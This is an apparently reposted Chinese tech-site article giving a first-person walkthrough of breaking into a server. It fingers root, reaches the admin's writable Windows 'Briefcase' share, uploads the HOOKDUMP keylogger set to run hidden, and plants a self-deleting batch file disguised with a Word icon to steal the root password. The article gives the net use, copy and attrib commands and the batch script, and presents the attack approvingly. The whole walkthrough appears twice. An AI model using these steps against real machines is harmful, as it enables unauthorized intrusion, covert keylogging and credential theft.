黑客怎樣入侵Linux系統(tǒng)
發(fā)布時(shí)間:2009-06-29 02:09:21 作者:佚名
我要評(píng)論
我發(fā)現(xiàn)了一個(gè)網(wǎng)站,于是常規(guī)入侵。很好,它的FINGER開著,于是我編了一個(gè)SHELL,aaa帳號(hào)試到zzz(by the way,這是我發(fā)現(xiàn)的一個(gè)網(wǎng)上規(guī)律,那就是帳號(hào)的長度與口令的強(qiáng)度成正比,如果一個(gè)帳號(hào)只有兩三位長,那它的口令一般也很簡單,反之亦然,故且稱之為若氏定理吧),結(jié)果一個(gè)
我發(fā)現(xiàn)了一個(gè)網(wǎng)站,于是常規(guī)入侵。很好,它的FINGER開著,于是我編了一個(gè)SHELL,aaa帳號(hào)試到zzz(by the way,這是我發(fā)現(xiàn)的一個(gè)網(wǎng)上規(guī)律,那就是帳號(hào)的長度與口令的強(qiáng)度成正比,如果一個(gè)帳號(hào)只有兩三位長,那它的口令一般也很簡單,反之亦然,故且稱之為若氏定理吧),結(jié)果一個(gè)帳號(hào)也不存在,我沒有再試它的帳號(hào)。因?yàn)槲冶凰_的端口吸引住了,它開著WWW,我就不信它不出錯(cuò)。一連拿了五種CGI和WWW掃描器總計(jì)掃了三四百種常見錯(cuò)誤它幾乎都不存在還是看看root的信息吧:
finger root@xxx.xxx.xxx
Login name: root In real life: system PRIVILEGED account
Directory: / Shell: /bin/sh
Last login Fri Jul 28 09:21 on ttyp0 from 202.xx.xx.xx
No Plan.
root經(jīng)常來,那個(gè)202.xx.xx.xx就是他用的工作站了,從那會(huì)不會(huì)看到點(diǎn)東西呢?
net view \202.xx.xx.xx
Shared resources at \202.xx.xx.xx
Sharename Type Comment
x
x
我的公文包
The command was completed successfully.
在上網(wǎng)的機(jī)器上開著WINDOWS的“文件和打印機(jī)共享”的服務(wù),是很多人容易掉以輕心的,這個(gè)root沒有例外。如果它的C盤共享了而且可寫那就好了,但那是做夢(mèng),現(xiàn)在開了共享的目錄沒有一個(gè)是根目錄,連D驅(qū)的都沒有。別著急,慢慢來。x掉的那些文件夾都沒用,不能寫,里面盡是些英文原著,這個(gè)root還挺行的。“我的公文包”吸引了我的注意,這是一個(gè)用于將不同的機(jī)器上的資料進(jìn)行同步的工具,很顯然這個(gè)root要經(jīng)常更新主機(jī)上的主頁,有時(shí)候在自己的機(jī)器上編,有時(shí)候在主機(jī)上編……所以很重要的一點(diǎn):“我的公文包”的共享一般都是可寫的!
那我再進(jìn)去看看。
>net use i: \202.xx.xx.xx
>i:
>echo asdf>temp.txt
不錯(cuò),確實(shí)可寫。
>del temp.txt
不留痕跡——黑客的習(xí)慣。
>dir/od/p
看看都有些什么…… 倒數(shù)第二排那個(gè)是什么?“X月工作計(jì)劃.doc”!就是它了,既然是計(jì)劃就不可能寫完了就丟一邊,它肯定會(huì)再次打開它的——至少下個(gè)月寫計(jì)劃時(shí)要COPY一下:->
page
該動(dòng)手了,我的目標(biāo)就是讓它下次打開時(shí)誤中我的陷阱而運(yùn)行我藏的木馬。我這次用的是一個(gè)鍵盤計(jì)錄軟件HOOKDUMP,我覺得它挺好的,價(jià)錢實(shí)惠,量也足…… 對(duì)不起,說習(xí)慣了,應(yīng)該是它不僅記錄下全部擊鍵,還記錄下打開或關(guān)掉了什么程序、按過什么按紐、用過什么菜單…… 總之,它的記錄讓你就和你站在他身后看他操作計(jì)算機(jī)一樣詳細(xì)了。您要問那么多木馬你為啥裝這個(gè)?要知道無論是中國的冰河、netspy還是外國的netbus、BO,都被各種殺毒軟件列為頭號(hào)偵查對(duì)象,而一個(gè)root的機(jī)器上可不可能沒裝殺毒軟件?還是HOOKDUMP好,小小的,不起眼,不過如果大家都用只怕我再用它的機(jī)會(huì)就少了……
>copy hookdump.* i:
補(bǔ)充一點(diǎn):上傳前先編好它的hookdump.ini文件,置為隱藏方式運(yùn)行,不然root一運(yùn)行屏幕上蹦出一大窗口可就……。
然后再在自己的機(jī)器上編一個(gè)同名的BAT文件:X月工作計(jì)劃.BAT
>edit c:X月工作計(jì)劃.BAT
@echo off
hookdump
attrib -h X月工作計(jì)劃.doc
C:Program FilesMicrosoftOfficeWinword X月工作計(jì)劃.doc
attrib -h temp.bat
del temp.pif
del temp.bat
看明白了吧?root運(yùn)行了這個(gè)BAT文件實(shí)際上就是先運(yùn)行木馬,再調(diào)用WINWORD文件打開它想開的這個(gè)文件,然后自我刪除,也許它機(jī)器上WINWORD的位置不同,那調(diào)用就會(huì)失敗,不過不要緊,反正BAT會(huì)馬上刪除,他會(huì)以為是自己的誤操作。
這時(shí)你的C驅(qū)根目錄就有了這么一個(gè)BAT文件,它是一個(gè)方形的圖標(biāo),和那個(gè)WORD文件大相徑庭,root怎么會(huì)運(yùn)行它呢?沒關(guān)系,在這個(gè)文件上點(diǎn)右鍵,點(diǎn)屬性,在“程序”欄選“更改圖標(biāo)”不就行了嗎?WORD的圖標(biāo)在你機(jī)器C:Program FilesMicrosoftOffice中。還要將“運(yùn)行”改為“最小化”,“退出時(shí)關(guān)閉”打上勾,這樣才能保證在運(yùn)行時(shí)一點(diǎn)跡象也沒有。事實(shí)上這個(gè) BAT文件變成了兩個(gè),還有一個(gè)PIF文件就是它的圖標(biāo)。
把這兩個(gè)文件傳上去:
>copy X月工作計(jì)劃.bat i:
>copy X月工作計(jì)劃.pif i:
然后把它的文件和自己的文件都藏起來:
>attrib +h X月工作計(jì)劃.doc
>attrib +h X月工作計(jì)劃.bat
這樣,root的“公文包”里只剩下一個(gè)和原來一模一樣的WORD圖標(biāo),他做夢(mèng)也沒想到這已變成了一個(gè)BAT文件。然后可以喘口氣了,讓我們靜靜的等……
幾天后,我進(jìn)入這個(gè)工作站,取下記錄下來的擊鍵記錄,找出root的口令,進(jìn)入主機(jī)。
finger root@xxx.xxx.xxx
Login name: root In real life: system PRIVILEGED account
Directory: / Shell: /bin/sh
Last login Fri Jul 28 09:21 on ttyp0 from 202.xx.xx.xx
No Plan.
root經(jīng)常來,那個(gè)202.xx.xx.xx就是他用的工作站了,從那會(huì)不會(huì)看到點(diǎn)東西呢?
net view \202.xx.xx.xx
Shared resources at \202.xx.xx.xx
Sharename Type Comment
x
x
我的公文包
The command was completed successfully.
在上網(wǎng)的機(jī)器上開著WINDOWS的“文件和打印機(jī)共享”的服務(wù),是很多人容易掉以輕心的,這個(gè)root沒有例外。如果它的C盤共享了而且可寫那就好了,但那是做夢(mèng),現(xiàn)在開了共享的目錄沒有一個(gè)是根目錄,連D驅(qū)的都沒有。別著急,慢慢來。x掉的那些文件夾都沒用,不能寫,里面盡是些英文原著,這個(gè)root還挺行的。“我的公文包”吸引了我的注意,這是一個(gè)用于將不同的機(jī)器上的資料進(jìn)行同步的工具,很顯然這個(gè)root要經(jīng)常更新主機(jī)上的主頁,有時(shí)候在自己的機(jī)器上編,有時(shí)候在主機(jī)上編……所以很重要的一點(diǎn):“我的公文包”的共享一般都是可寫的!
那我再進(jìn)去看看。
>net use i: \202.xx.xx.xx
>i:
>echo asdf>temp.txt
不錯(cuò),確實(shí)可寫。
>del temp.txt
不留痕跡——黑客的習(xí)慣。
>dir/od/p
看看都有些什么…… 倒數(shù)第二排那個(gè)是什么?“X月工作計(jì)劃.doc”!就是它了,既然是計(jì)劃就不可能寫完了就丟一邊,它肯定會(huì)再次打開它的——至少下個(gè)月寫計(jì)劃時(shí)要COPY一下:->
page
該動(dòng)手了,我的目標(biāo)就是讓它下次打開時(shí)誤中我的陷阱而運(yùn)行我藏的木馬。我這次用的是一個(gè)鍵盤計(jì)錄軟件HOOKDUMP,我覺得它挺好的,價(jià)錢實(shí)惠,量也足…… 對(duì)不起,說習(xí)慣了,應(yīng)該是它不僅記錄下全部擊鍵,還記錄下打開或關(guān)掉了什么程序、按過什么按紐、用過什么菜單…… 總之,它的記錄讓你就和你站在他身后看他操作計(jì)算機(jī)一樣詳細(xì)了。您要問那么多木馬你為啥裝這個(gè)?要知道無論是中國的冰河、netspy還是外國的netbus、BO,都被各種殺毒軟件列為頭號(hào)偵查對(duì)象,而一個(gè)root的機(jī)器上可不可能沒裝殺毒軟件?還是HOOKDUMP好,小小的,不起眼,不過如果大家都用只怕我再用它的機(jī)會(huì)就少了……
>copy hookdump.* i:
補(bǔ)充一點(diǎn):上傳前先編好它的hookdump.ini文件,置為隱藏方式運(yùn)行,不然root一運(yùn)行屏幕上蹦出一大窗口可就……。
然后再在自己的機(jī)器上編一個(gè)同名的BAT文件:X月工作計(jì)劃.BAT
>edit c:X月工作計(jì)劃.BAT
@echo off
hookdump
attrib -h X月工作計(jì)劃.doc
C:Program FilesMicrosoftOfficeWinword X月工作計(jì)劃.doc
attrib -h temp.bat
del temp.pif
del temp.bat
看明白了吧?root運(yùn)行了這個(gè)BAT文件實(shí)際上就是先運(yùn)行木馬,再調(diào)用WINWORD文件打開它想開的這個(gè)文件,然后自我刪除,也許它機(jī)器上WINWORD的位置不同,那調(diào)用就會(huì)失敗,不過不要緊,反正BAT會(huì)馬上刪除,他會(huì)以為是自己的誤操作。
這時(shí)你的C驅(qū)根目錄就有了這么一個(gè)BAT文件,它是一個(gè)方形的圖標(biāo),和那個(gè)WORD文件大相徑庭,root怎么會(huì)運(yùn)行它呢?沒關(guān)系,在這個(gè)文件上點(diǎn)右鍵,點(diǎn)屬性,在“程序”欄選“更改圖標(biāo)”不就行了嗎?WORD的圖標(biāo)在你機(jī)器C:Program FilesMicrosoftOffice中。還要將“運(yùn)行”改為“最小化”,“退出時(shí)關(guān)閉”打上勾,這樣才能保證在運(yùn)行時(shí)一點(diǎn)跡象也沒有。事實(shí)上這個(gè) BAT文件變成了兩個(gè),還有一個(gè)PIF文件就是它的圖標(biāo)。
把這兩個(gè)文件傳上去:
>copy X月工作計(jì)劃.bat i:
>copy X月工作計(jì)劃.pif i:
然后把它的文件和自己的文件都藏起來:
>attrib +h X月工作計(jì)劃.doc
>attrib +h X月工作計(jì)劃.bat
這樣,root的“公文包”里只剩下一個(gè)和原來一模一樣的WORD圖標(biāo),他做夢(mèng)也沒想到這已變成了一個(gè)BAT文件。然后可以喘口氣了,讓我們靜靜的等……
幾天后,我進(jìn)入這個(gè)工作站,取下記錄下來的擊鍵記錄,找出root的口令,進(jìn)入主機(jī)。
相關(guān)文章

集成系統(tǒng)級(jí)Claw模式! Deepin 官宣發(fā)布 25.1 版本
deepin操作系統(tǒng)發(fā)布了最新的 25.1 版本更新,該版本基于 deepin 25 正式版積累的多輪內(nèi)測(cè)成果,在 AI 能力、內(nèi)核版本、桌面環(huán)境、文件管理器以及系統(tǒng)安全等方面進(jìn)行了更新2026-04-13
又一代老硬件退場(chǎng)! Linux 內(nèi)核正式放棄Intel 486 CPU
在過去的幾十年間,CPU 的架構(gòu)已經(jīng)經(jīng)歷了飛速發(fā)展,x86 系列就是其中之一,而 i486 則屬于該系列中的一個(gè),當(dāng)前,i486 的CPU處理器已經(jīng)夠老,從 Linux 7.1 開始將不再有對(duì)2026-04-09
趕緊收藏! 全網(wǎng)最全 Linux 命令總結(jié)
我把 Linux 中最常用、最實(shí)用、最常被問到的命令按照實(shí)際使用場(chǎng)景分類整理,方便你快速查閱和記憶,內(nèi)容覆蓋日常運(yùn)維、開發(fā)調(diào)試、性能分析、文件處理、網(wǎng)絡(luò)、安全、系統(tǒng)管2026-04-08
一分鐘內(nèi)檢查Linux服務(wù)器性能? 9個(gè)性能檢測(cè)常用的基本命令
今天我們來看看Linux系統(tǒng)中用于性能監(jiān)控的一系列命令,這些命令可以快速查看機(jī)器的負(fù)載情況,詳細(xì)請(qǐng)看下文介紹2026-03-18
從零基礎(chǔ)到精通! 適合高級(jí)用戶的15款Linux發(fā)行版推薦
Linux作為操作系統(tǒng)領(lǐng)域靈活性和可定制性的基石,提供了大量滿足不同用戶需求的發(fā)行版,今天分享適合高級(jí)用戶的15款Linux發(fā)行版2026-03-10
開箱即用? 這4個(gè)高手級(jí)Linux發(fā)行版遠(yuǎn)沒你想象的那么安全易用
如果你正在糾結(jié)用哪個(gè)發(fā)行版?零基礎(chǔ)新手別被“高端”“極客”“聲明式”這些詞沖昏頭腦,先用好用的,再慢慢進(jìn)階2026-03-10
這幾款SSH工具真的夠用了! Linux好用的ssh工具推薦
在Linux上使用SSH,您需要安裝一個(gè)SSH客戶端,今天整理找到的8 款 SSH / 終端工具,從免費(fèi)開源到企業(yè)級(jí)商用,從輕量化命令行到一站式工具箱,每款都做了介紹與對(duì)比,希望能2026-03-09
在Linux系統(tǒng)下有兩種用戶,即高級(jí)用戶root,普通用戶,高級(jí)用戶root可以在系統(tǒng)中做任何事情,普通用戶僅可在Linux系統(tǒng)中做有限的事情,下面我們就來看看切換方法2026-02-28
揭秘當(dāng)前登錄用戶的身份! Linux中使用logname命令的技巧
logname命令就是這樣一個(gè)簡單但強(qiáng)大的工具,它能幫助我們輕松獲取當(dāng)前登錄用戶的用戶名,今天,我們就來深入探索一下這個(gè)命令的工作原理、使用方法和最佳實(shí)踐2026-02-26
在 Linux 系統(tǒng)中,DNS 緩存是一種將域名和 IP 地址映射關(guān)系緩存在本地的機(jī)制,可以加快域名解析速度,并減輕 DNS 服務(wù)器的負(fù)載2026-02-26



